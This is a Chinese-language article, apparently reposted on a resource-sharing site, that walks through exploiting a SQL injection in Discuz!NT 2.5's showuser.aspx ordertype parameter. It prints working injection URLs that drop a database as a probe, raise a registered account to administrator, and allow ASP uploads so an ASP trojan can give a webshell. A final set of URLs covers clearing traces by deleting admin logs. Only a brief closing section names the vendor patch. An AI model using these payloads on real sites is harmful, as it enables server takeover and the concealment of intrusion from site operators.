Discuz!NT 2.5最新注入漏洞测试分析(图)
Discuz!NT是一款功能强大的基于ASP.net平台的BBS系统,占有不少的市场份额,特别是一些大中型专业社区都采用该系统。最近,ISTO成员在其最新的2.5版本中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。下面笔者部署环境解析该漏洞,以期引起大家的重视。
环境描述
操作系统:Windows 2003
Discuz!NT版本:2.5
URL:http://www.gslw.com
数据库:SQL Server 2005
1、漏洞起因
漏洞是由showuser.aspx文件引起的,该文件的作用是显示论坛的会员列表。由于脚本中对于用来用户排序的ordertype参数未经过滤而直接查询数据库,攻击者可以通过精心构造的ordertype参数进行数据库的写操作。(图1)
2、漏洞测试
判断Discuz!NT是否存在该漏洞,我们可以构造ordertype参数进程测试。下面代码的意思是删除gslw数据库,由于不存在gslw数据库因此会报错“无法对数据库'glsw'执行删除,因为它不存在,或者您没有所需的权限。”这就说明执行了数据库操作,我们可以根据错误信息判断是否存在该漏洞。我们构造的URl为
http://www.gslw.com/showuser.aspx?ordertype=desc;drop database glsw;–
显示的错误页面见图1,说明存在该漏洞。(图2)
3、用户提权
打开论坛注册一个用户为hacker的会员见图3,然后我们可以进行构造一段URL通过showuser.aspx的ordertype参数将hacker提升为管理员。构造的URL为“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='hacker';–”其作用就是将注册用户hacker的adminid和guoupid设置为1,也就是将其提升为管理员。将该URL输入浏览器地址栏回车后可以看到hacker被提升为管理员见图4。(图3)(图4)
hacker被提升为管理员后就可以登录系统后台进行各种操作了。Discuz!NT的后台功能确实比较强大,(图5)
4、更改上传格式
该漏洞除了可以提升管理员为,还可以更改默认的附件上传格式。默认情况下,Discuz!NT只支持jpg,gif,png,zip,rar,jpeg格式的附件上传,利用该漏洞可以将其中的某种格式替换为asp、aspx等可执行脚本的格式,从而获得一个Webshell。我们可以构造URL更改其上传文件格式,比如我们将jgp格式更改为aspx格式,就可以构造这样的URL“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='asp' where extension='jpg';–” ,最终的执行效果见图6。(图6)
5、获得Webshell
通过上面的操作我们就可以在任意一论坛版块下发表新主题 ,然后通过附件上传功能将以asp木马上传到服务器。上传完成后,在“我的附件”项下可以找到上传的asp木马,点击该asp网马就直接运行,登录后获得一个webshell。(图7)
6、清除痕迹
获得webshell后,就可以通过该漏洞构造URL清除痕迹,恢复Discuz!NT的默认状态。主要包括一下几项:
http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='asp';– 改回jpg格式
http://www.gslw.com/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='hacker';– 清除日志
http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='hacker';– hacker降权限
7、总结及防范
从上面的演示可以看到该漏洞对采用Discuz!NT的BBS威胁极大,攻击者不仅能够进入后台,而且可以获取webshell,进而渗透控制服务器。笔者上面演示用的是asp木马,如果用aspx木马其权限将更大,拿下服务器将会更容易。
针对此漏洞Discuz!NT官方提供了补丁,该补丁的地址为:
http://download.comsenz.com/DiscuzNT/patch/dnt_25_n2_patch20080829.zip
修正方法是将压缩包中的Discuz.Web.dll文件上传到bin目录,覆盖掉以前的文件。虽然Discuz!NT比较迅速地发布了补丁,但是笔者在此刻进行了安全测试,有相当多的采用Discuz!NT 2.5系统的BBS论坛依旧没有打该补丁。希望通过此文,能够引起大家对该漏洞的重视,尽快修复漏洞。
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » Discuz!NT 2.5最新注入漏洞测试分析(图)
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html
